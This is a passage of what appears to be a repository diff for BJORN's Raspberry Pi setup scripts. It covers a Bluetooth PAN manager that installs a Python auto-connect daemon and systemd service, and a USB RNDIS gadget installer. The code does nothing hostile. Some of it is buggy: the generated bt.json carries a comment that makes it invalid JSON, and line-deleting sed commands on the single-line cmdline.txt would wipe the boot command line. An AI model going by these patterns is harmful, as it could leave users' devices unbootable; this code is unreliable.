# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install Bluetooth PAN"
echo -e " ${BLUE}-u${NC} Uninstall Bluetooth PAN"
echo -e " ${BLUE}-l${NC} List Bluetooth PAN Information"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install Bluetooth PAN"
echo -e " $0 -u Uninstall Bluetooth PAN"
echo -e " $0 -l List Bluetooth PAN Information"
echo -e " $0 -h Show help"
echo -e ""
echo -e "${YELLOW}===== Bluetooth PAN Configuration Procedure =====${NC}"
echo -e "To configure the Bluetooth PAN driver and set the IP address, subnet mask, and gateway for the PAN network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e " - DNS Servers: 8.8.8.8, 8.8.4.4"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the Bluetooth PAN, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart auto_bt_connect.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the PAN network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "===== End of Procedure =====${NC}"
exit 1
}
# ============================================================
# Function to Install Bluetooth PAN
# ============================================================
install_bluetooth_pan() {
log "INFO" "Starting Bluetooth PAN installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Create settings directory
SETTINGS_DIR="/home/bjorn/.settings_bjorn"
if [ ! -d "$SETTINGS_DIR" ]; then
mkdir -p "$SETTINGS_DIR"
check_success "Created settings directory at $SETTINGS_DIR"
else
log "INFO" "Settings directory $SETTINGS_DIR already exists. Skipping creation."
fi
# Create bt.json if it doesn't exist
BT_CONFIG="$SETTINGS_DIR/bt.json"
if [ ! -f "$BT_CONFIG" ]; then
log "INFO" "Creating Bluetooth configuration file at $BT_CONFIG"
cat << 'EOF' > "$BT_CONFIG"
{
"device_mac": "AA:BB:CC:DD:EE:FF" # Replace with your device's MAC address
}
EOF
check_success "Created Bluetooth configuration file at $BT_CONFIG"
log "WARNING" "Please edit $BT_CONFIG to include your Bluetooth device's MAC address."
else
log "INFO" "Bluetooth configuration file $BT_CONFIG already exists. Skipping creation."
fi
# Create auto_bt_connect.py
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
if [ ! -f "$BT_PY_SCRIPT" ]; then
log "INFO" "Creating Bluetooth auto-connect Python script at $BT_PY_SCRIPT"
cat << 'EOF' > "$BT_PY_SCRIPT"
#!/usr/bin/env python3
import json
import subprocess
import time
import logging
import os
LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
logging.basicConfig(filename="/var/log/auto_bt_connect.log", level=logging.INFO, format=LOG_FORMAT)
logger = logging.getLogger("auto_bt_connect")
CONFIG_PATH = "/home/bjorn/.settings_bjorn/bt.json"
CHECK_INTERVAL = 30 # Interval in seconds between each check
def ensure_bluetooth_service():
try:
res = subprocess.run(["systemctl", "is-active", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if "active" not in res.stdout:
logger.info("Bluetooth service not active. Starting and enabling it...")
start_res = subprocess.run(["systemctl", "start", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if start_res.returncode != 0:
logger.error(f"Failed to start bluetooth service: {start_res.stderr}")
return False
enable_res = subprocess.run(["systemctl", "enable", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if enable_res.returncode != 0:
logger.error(f"Failed to enable bluetooth service: {enable_res.stderr}")
# Not fatal, but log it.
else:
logger.info("Bluetooth service enabled successfully.")
else:
logger.info("Bluetooth service is already active.")
return True
except Exception as e:
logger.error(f"Error ensuring bluetooth service: {e}")
return False
def is_already_connected():
# Check if bnep0 interface is up with an IP
ip_res = subprocess.run(["ip", "addr", "show", "bnep0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if ip_res.returncode == 0 and "inet " in ip_res.stdout:
# bnep0 interface exists and has an IPv4 address
logger.info("bnep0 is already up and has an IP. No action needed.")
return True
return False
def run_in_background(cmd):
# Run a command in background, return the process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
return process
def establish_connection(device_mac):
# Attempt to run bt-network
logger.info(f"Attempting to connect PAN with device {device_mac}...")
bt_process = run_in_background(["bt-network", "-c", device_mac, "nap"])
# Wait a bit for PAN to set up
time.sleep(3)
# Check if bt-network exited prematurely
if bt_process.poll() is not None:
# Process ended
if bt_process.returncode != 0:
stderr_output = bt_process.stderr.read() if bt_process.stderr else ""
logger.error(f"bt-network failed: {stderr_output}")
return False
else:
logger.warning("bt-network ended immediately. PAN may not be established.")
return False
else:
logger.info("bt-network running in background...")
# Now run dhclient for IPv4
dh_res = subprocess.run(["dhclient", "-4", "bnep0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if dh_res.returncode != 0:
logger.error(f"dhclient failed: {dh_res.stderr}")
return False
logger.info("Successfully obtained IP on bnep0. PAN connection established.")
return True
def load_config():
if not os.path.exists(CONFIG_PATH):
logger.error(f"Config file {CONFIG_PATH} not found.")
return None
try:
with open(CONFIG_PATH, "r") as f:
config = json.load(f)
device_mac = config.get("device_mac")
if not device_mac:
logger.error("No device_mac found in config.")
return None
return device_mac
except Exception as e:
logger.error(f"Error loading config: {e}")
return None
def main():
device_mac = load_config()
if not device_mac:
return
while True:
try:
if not ensure_bluetooth_service():
logger.error("Bluetooth service setup failed.")
elif is_already_connected():
# Already connected and has IP, do nothing
pass
else:
# Attempt to establish connection
success = establish_connection(device_mac)
if not success:
logger.warning("Failed to establish PAN connection.")
except Exception as e:
logger.error(f"Unexpected error in main loop: {e}")
# Wait before the next check
time.sleep(CHECK_INTERVAL)
if __name__ == "__main__":
main()
EOF
check_success "Created Bluetooth auto-connect Python script at $BT_PY_SCRIPT"
else
log "INFO" "Bluetooth auto-connect Python script $BT_PY_SCRIPT already exists. Skipping creation."
fi
# Make the Python script executable
chmod +x "$BT_PY_SCRIPT"
check_success "Made Python script executable at $BT_PY_SCRIPT"
# Create the systemd service
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
if [ ! -f "$BT_SERVICE" ]; then
log "INFO" "Creating systemd service at $BT_SERVICE"
cat << 'EOF' > "$BT_SERVICE"
[Unit]
Description=Auto Bluetooth PAN Connect
After=network.target bluetooth.service
Wants=bluetooth.service
[Service]
Type=simple
ExecStart=/usr/local/bin/auto_bt_connect.py
Restart=on-failure
RestartSec=10
[Install]
WantedBy=multi-user.target
EOF
check_success "Created systemd service at $BT_SERVICE"
else
log "INFO" "Systemd service $BT_SERVICE already exists. Skipping creation."
fi
# Reload systemd daemon
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Enable and start the service
systemctl enable auto_bt_connect.service
check_success "Enabled auto_bt_connect.service"
systemctl start auto_bt_connect.service
check_success "Started auto_bt_connect.service"
echo -e "${GREEN}Bluetooth PAN installation completed successfully. A reboot is required for changes to take effect.${NC}"
}
# ============================================================
# Function to Uninstall Bluetooth PAN
# ============================================================
uninstall_bluetooth_pan() {
log "INFO" "Starting Bluetooth PAN uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
SETTINGS_DIR="/home/bjorn/.settings_bjorn"
BT_CONFIG="$SETTINGS_DIR/bt.json"
# Stop and disable the service
if systemctl is-active --quiet auto_bt_connect.service; then
systemctl stop auto_bt_connect.service
check_success "Stopped auto_bt_connect.service"
else
log "INFO" "auto_bt_connect.service is not running."
fi
if systemctl is-enabled --quiet auto_bt_connect.service; then
systemctl disable auto_bt_connect.service
check_success "Disabled auto_bt_connect.service"
else
log "INFO" "auto_bt_connect.service is not enabled."
fi
# Remove the systemd service file
if [ -f "$BT_SERVICE" ]; then
rm "$BT_SERVICE"
check_success "Removed $BT_SERVICE"
else
log "INFO" "$BT_SERVICE does not exist. Skipping removal."
fi
# Remove the Python script
if [ -f "$BT_PY_SCRIPT" ]; then
rm "$BT_PY_SCRIPT"
check_success "Removed $BT_PY_SCRIPT"
else
log "INFO" "$BT_PY_SCRIPT does not exist. Skipping removal."
fi
# Remove Bluetooth configuration directory and file
if [ -d "$SETTINGS_DIR" ]; then
rm -rf "$SETTINGS_DIR"
check_success "Removed settings directory at $SETTINGS_DIR"
else
log "INFO" "Settings directory $SETTINGS_DIR does not exist. Skipping removal."
fi
# Reload systemd daemon
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "SUCCESS" "Bluetooth PAN uninstallation completed successfully."
}
# ============================================================
# Function to List Bluetooth PAN Information
# ============================================================
list_bluetooth_pan_info() {
echo -e "${CYAN}===== Bluetooth PAN Information =====${NC}"
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
BT_CONFIG="/home/bjorn/.settings_bjorn/bt.json"
# Check status of auto_bt_connect.service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q auto_bt_connect.service; then
systemctl status auto_bt_connect.service --no-pager
else
echo -e "${RED}auto_bt_connect.service is not installed.${NC}"
fi
# Check if Bluetooth auto-connect Python script exists
echo -e "\n${YELLOW}Bluetooth Auto-Connect Script:${NC}"
if [ -f "$BT_PY_SCRIPT" ]; then
echo -e "${GREEN}$BT_PY_SCRIPT exists.${NC}"
else
echo -e "${RED}$BT_PY_SCRIPT does not exist.${NC}"
fi
# Check Bluetooth configuration file
echo -e "\n${YELLOW}Bluetooth Configuration File:${NC}"
if [ -f "$BT_CONFIG" ]; then
echo -e "${GREEN}$BT_CONFIG exists.${NC}"
echo -e "${CYAN}Contents:${NC}"
cat "$BT_CONFIG"
else
echo -e "${RED}$BT_CONFIG does not exist.${NC}"
fi
echo -e "\n===== End of Information ====="
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Bluetooth PAN Manager Menu ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install Bluetooth PAN ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall Bluetooth PAN ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List Bluetooth PAN Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
case $choice in
1)
install_bluetooth_pan
echo ""
read -p "Press Enter to return to the menu..."
;;
2)
uninstall_bluetooth_pan
echo ""
read -p "Press Enter to return to the menu..."
;;
3)
list_bluetooth_pan_info
echo ""
read -p "Press Enter to return to the menu..."
;;
4)
show_usage
;;
5)
log "INFO" "Exiting Bluetooth PAN Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_bluetooth_pan
exit 0
;;
u)
uninstall_bluetooth_pan
exit 0
;;
l)
list_bluetooth_pan_info
exit 0
;;
h)
show_usage
;;
\?)
echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

567
bjorn_usb_gadget.sh Normal file
View File

@@ -0,0 +1,567 @@
#!/bin/bash
# bjorn_usb_gadget.sh
# Script to configure USB Gadget for BJORN
# Usage: ./bjorn_usb_gadget.sh -f
# ./bjorn_usb_gadget.sh -u
# ./bjorn_usb_gadget.sh -l
# ./bjorn_usb_gadget.sh -h
# Author: Infinition
# Version: 1.4
# Description: This script configures and manages USB Gadget for BJORN with duplicate prevention
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
# ============================================================
# Logging Configuration
# ============================================================
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_usb_gadget_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" | tee -a "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
*) echo -e "$message" ;;
esac
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "$1"
return $?
fi
}
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install USB Gadget"
echo -e " ${BLUE}-u${NC} Uninstall USB Gadget"
echo -e " ${BLUE}-l${NC} List USB Gadget Information"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install USB Gadget"
echo -e " $0 -u Uninstall USB Gadget"
echo -e " $0 -l List USB Gadget Information"
echo -e " $0 -h Show help"
echo -e ""
echo -e "${YELLOW}===== RNDIS Configuration Procedure =====${NC}"
echo -e "To configure the RNDIS driver and set the IP address, subnet mask, and gateway for the RNDIS network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the USB gadget, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart usb-gadget.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the RNDIS network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "===== End of Procedure =====${NC}"
exit 1
}
# ============================================================
# Function to Install USB Gadget with RNDIS
# ============================================================
install_usb_gadget() {
log "INFO" "Starting USB Gadget installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Backup cmdline.txt and config.txt if not already backed up
if [ ! -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt /boot/firmware/cmdline.txt.bak
check_success "Backed up /boot/firmware/cmdline.txt to /boot/firmware/cmdline.txt.bak"
else
log "INFO" "/boot/firmware/cmdline.txt.bak already exists. Skipping backup."
fi
if [ ! -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt /boot/firmware/config.txt.bak
check_success "Backed up /boot/firmware/config.txt to /boot/firmware/config.txt.bak"
else
log "INFO" "/boot/firmware/config.txt.bak already exists. Skipping backup."
fi
# Modify cmdline.txt: Remove existing modules-load entries related to dwc2
log "INFO" "Cleaning up existing modules-load entries in /boot/firmware/cmdline.txt"
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
check_success "Removed duplicate modules-load entries from /boot/firmware/cmdline.txt"
# Add a single modules-load=dwc2,g_rndis if not present
if ! grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_rndis/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_rndis to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_rndis already present in /boot/firmware/cmdline.txt"
fi
# Add a single modules-load=dwc2,g_ether if not present
if ! grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_ether/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_ether to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_ether already present in /boot/firmware/cmdline.txt"
fi
# Modify config.txt: Remove duplicate dtoverlay=dwc2 entries
log "INFO" "Cleaning up existing dtoverlay=dwc2 entries in /boot/firmware/config.txt"
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
check_success "Removed duplicate dtoverlay=dwc2 entries from /boot/firmware/config.txt"
# Append a single dtoverlay=dwc2 if not present
if ! grep -q "^dtoverlay=dwc2$" /boot/firmware/config.txt; then
echo "dtoverlay=dwc2" | sudo tee -a /boot/firmware/config.txt
check_success "Appended dtoverlay=dwc2 to /boot/firmware/config.txt"
else
log "INFO" "dtoverlay=dwc2 already present in /boot/firmware/config.txt"
fi
# Create USB gadget script
if [ ! -f /usr/local/bin/usb-gadget.sh ]; then
log "INFO" "Creating USB gadget script at /usr/local/bin/usb-gadget.sh"
cat > /usr/local/bin/usb-gadget.sh << 'EOF'
#!/bin/bash
set -e
# Enable debug mode for detailed logging
set -x
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir -p g1
cd g1
echo 0x1d6b > idVendor
echo 0x0104 > idProduct
echo 0x0100 > bcdDevice
echo 0x0200 > bcdUSB
mkdir -p strings/0x409
echo "fedcba9876543210" > strings/0x409/serialnumber
echo "Raspberry Pi" > strings/0x409/manufacturer
echo "Pi Zero USB" > strings/0x409/product
mkdir -p configs/c.1/strings/0x409
echo "Config 1: RNDIS Network" > configs/c.1/strings/0x409/configuration
echo 250 > configs/c.1/MaxPower
mkdir -p functions/rndis.usb0
# Remove existing symlink if it exists to prevent duplicates
if [ -L configs/c.1/rndis.usb0 ]; then
rm configs/c.1/rndis.usb0
fi
ln -s functions/rndis.usb0 configs/c.1/
# Ensure the device is not busy before listing available USB device controllers
max_retries=10
retry_count=0
while ! ls /sys/class/udc > UDC 2>/dev/null; do
if [ $retry_count -ge $max_retries ]; then
echo "Error: Device or resource busy after $max_retries attempts."
exit 1
fi
retry_count=$((retry_count + 1))
sleep 1
done
# Assign the USB Device Controller (UDC)
UDC_NAME=$(ls /sys/class/udc)
echo "$UDC_NAME" > UDC
echo "Assigned UDC: $UDC_NAME"
# Check if the usb0 interface is already configured
if ! ip addr show usb0 | grep -q "172.20.2.1"; then
ifconfig usb0 172.20.2.1 netmask 255.255.255.0
echo "Configured usb0 with IP 172.20.2.1"
else
echo "Interface usb0 already configured."
fi
EOF
chmod +x /usr/local/bin/usb-gadget.sh
check_success "Created and made USB gadget script executable at /usr/local/bin/usb-gadget.sh"
else
log "INFO" "USB gadget script /usr/local/bin/usb-gadget.sh already exists. Skipping creation."
fi
# Create USB gadget service
if [ ! -f /etc/systemd/system/usb-gadget.service ]; then
log "INFO" "Creating USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
cat > /etc/systemd/system/usb-gadget.service << EOF
[Unit]
Description=USB Gadget Service
After=network.target
[Service]
ExecStartPre=/sbin/modprobe libcomposite
ExecStart=/usr/local/bin/usb-gadget.sh
Type=simple
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
check_success "Created USB gadget systemd service at /etc/systemd/system/usb-gadget.service"
else
log "INFO" "USB gadget systemd service /etc/systemd/system/usb-gadget.service already exists. Skipping creation."
fi
# Configure network interface: Remove duplicate entries first
log "INFO" "Cleaning up existing network interface configurations for usb0 in /etc/network/interfaces"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
# Remove all lines starting with allow-hotplug usb0 and the following lines (iface and settings)
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed existing network interface configurations for usb0 from /etc/network/interfaces"
else
log "INFO" "No existing network interface configuration for usb0 found in /etc/network/interfaces."
fi
# Append network interface configuration for usb0 if not already present
if ! grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Appending network interface configuration for usb0 to /etc/network/interfaces"
cat >> /etc/network/interfaces << EOF
allow-hotplug usb0
iface usb0 inet static
address 172.20.2.1
netmask 255.255.255.0
gateway 172.20.2.1
EOF
check_success "Appended network interface configuration for usb0 to /etc/network/interfaces"
else
log "INFO" "Network interface usb0 already configured in /etc/network/interfaces"
fi
# Reload systemd daemon and enable/start services
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "INFO" "Enabling systemd-networkd service"
systemctl enable systemd-networkd
check_success "Enabled systemd-networkd service"
log "INFO" "Enabling usb-gadget service"
systemctl enable usb-gadget.service
check_success "Enabled usb-gadget service"
log "INFO" "Starting systemd-networkd service"
systemctl start systemd-networkd
check_success "Started systemd-networkd service"
log "INFO" "Starting usb-gadget service"
systemctl start usb-gadget.service
check_success "Started usb-gadget service"
log "SUCCESS" "USB Gadget installation completed successfully."
}
# ============================================================
# Function to Uninstall USB Gadget
# ============================================================
uninstall_usb_gadget() {
log "INFO" "Starting USB Gadget uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Stop and disable USB gadget service
if systemctl is-active --quiet usb-gadget.service; then
systemctl stop usb-gadget.service
check_success "Stopped usb-gadget.service"
else
log "INFO" "usb-gadget.service is not running."
fi
if systemctl is-enabled --quiet usb-gadget.service; then
systemctl disable usb-gadget.service
check_success "Disabled usb-gadget.service"
else
log "INFO" "usb-gadget.service is not enabled."
fi
# Remove USB gadget service file
if [ -f /etc/systemd/system/usb-gadget.service ]; then
rm /etc/systemd/system/usb-gadget.service
check_success "Removed /etc/systemd/system/usb-gadget.service"
else
log "INFO" "/etc/systemd/system/usb-gadget.service does not exist. Skipping removal."
fi
# Remove USB gadget script
if [ -f /usr/local/bin/usb-gadget.sh ]; then
rm /usr/local/bin/usb-gadget.sh
check_success "Removed /usr/local/bin/usb-gadget.sh"
else
log "INFO" "/usr/local/bin/usb-gadget.sh does not exist. Skipping removal."
fi
# Restore cmdline.txt and config.txt from backups
if [ -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt.bak /boot/firmware/cmdline.txt
chmod 644 /boot/firmware/cmdline.txt
check_success "Restored /boot/firmware/cmdline.txt from backup"
else
log "WARNING" "Backup /boot/firmware/cmdline.txt.bak not found. Skipping restoration."
fi
if [ -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt.bak /boot/firmware/config.txt
check_success "Restored /boot/firmware/config.txt from backup"
else
log "WARNING" "Backup /boot/firmware/config.txt.bak not found. Skipping restoration."
fi
# Remove network interface configuration for usb0: Remove all related lines
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
log "INFO" "Removing network interface configuration for usb0 from /etc/network/interfaces"
# Remove lines from allow-hotplug usb0 up to the next empty line
sudo sed -i '/^allow-hotplug usb0$/,/^$/d' /etc/network/interfaces
check_success "Removed network interface configuration for usb0 from /etc/network/interfaces"
else
log "INFO" "Network interface usb0 not found in /etc/network/interfaces. Skipping removal."
fi
# Reload systemd daemon
log "INFO" "Reloading systemd daemon"
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Disable and stop systemd-networkd service
if systemctl is-active --quiet systemd-networkd; then
systemctl stop systemd-networkd
check_success "Stopped systemd-networkd service"
else
log "INFO" "systemd-networkd service is not running."
fi
if systemctl is-enabled --quiet systemd-networkd; then
systemctl disable systemd-networkd
check_success "Disabled systemd-networkd service"
else
log "INFO" "systemd-networkd service is not enabled."
fi
# Clean up any remaining duplicate entries in cmdline.txt and config.txt
log "INFO" "Ensuring no duplicate entries remain in configuration files."
# Remove any remaining modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
# Remove any remaining dtoverlay=dwc2
sudo sed -i '/^dtoverlay=dwc2$/d' /boot/firmware/config.txt
log "INFO" "Cleaned up duplicate entries in /boot/firmware/cmdline.txt and /boot/firmware/config.txt"
log "SUCCESS" "USB Gadget uninstallation completed successfully."
}
# ============================================================
# Function to List USB Gadget Information
# ============================================================
list_usb_gadget_info() {
echo -e "${CYAN}===== USB Gadget Information =====${NC}"
# Check status of usb-gadget service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q usb-gadget.service; then
systemctl status usb-gadget.service --no-pager
else
echo -e "${RED}usb-gadget.service is not installed.${NC}"
fi
# Check if USB gadget script exists
echo -e "\n${YELLOW}USB Gadget Script:${NC}"
if [ -f /usr/local/bin/usb-gadget.sh ]; then
echo -e "${GREEN}/usr/local/bin/usb-gadget.sh exists.${NC}"
else
echo -e "${RED}/usr/local/bin/usb-gadget.sh does not exist.${NC}"
fi
# Check network interface configuration
echo -e "\n${YELLOW}Network Interface Configuration for usb0:${NC}"
if grep -q "^allow-hotplug usb0" /etc/network/interfaces; then
grep "^allow-hotplug usb0" /etc/network/interfaces -A 4
else
echo -e "${RED}No network interface configuration found for usb0.${NC}"
fi
# Check cmdline.txt
echo -e "\n${YELLOW}/boot/firmware/cmdline.txt:${NC}"
if grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt && grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
echo -e "${GREEN}modules-load=dwc2,g_rndis and modules-load=dwc2,g_ether are present.${NC}"
else
echo -e "${RED}modules-load=dwc2,g_rndis and/or modules-load=dwc2,g_ether are not present.${NC}"
fi
# Check config.txt
echo -e "\n${YELLOW}/boot/firmware/config.txt:${NC}"
if grep -q "^dtoverlay=dwc2" /boot/firmware/config.txt; then
echo -e "${GREEN}dtoverlay=dwc2 is present.${NC}"
else
echo -e "${RED}dtoverlay=dwc2 is not present.${NC}"
fi
# Check if systemd-networkd is enabled
echo -e "\n${YELLOW}systemd-networkd Service:${NC}"
if systemctl is-enabled --quiet systemd-networkd; then
systemctl is-active systemd-networkd && echo -e "${GREEN}systemd-networkd is active.${NC}" || echo -e "${RED}systemd-networkd is inactive.${NC}"
else
echo -e "${RED}systemd-networkd is not enabled.${NC}"
fi
echo -e "\n===== End of Information ====="
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ USB Gadget Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall USB Gadget ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List USB Gadget Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
case $choice in
1)
install_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
;;
2)
uninstall_usb_gadget
echo ""
read -p "Press Enter to return to the menu..."
;;
3)
list_usb_gadget_info
echo ""
read -p "Press Enter to return to the menu..."
;;
4)
show_usage
;;
5)
log "INFO" "Exiting USB Gadget Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_usb_gadget
exit 0
;;
u)
uninstall_usb_gadget
exit 0
;;
l)
list_usb_gadget_info
exit 0
;;
h)
show_usage
;;
\?)
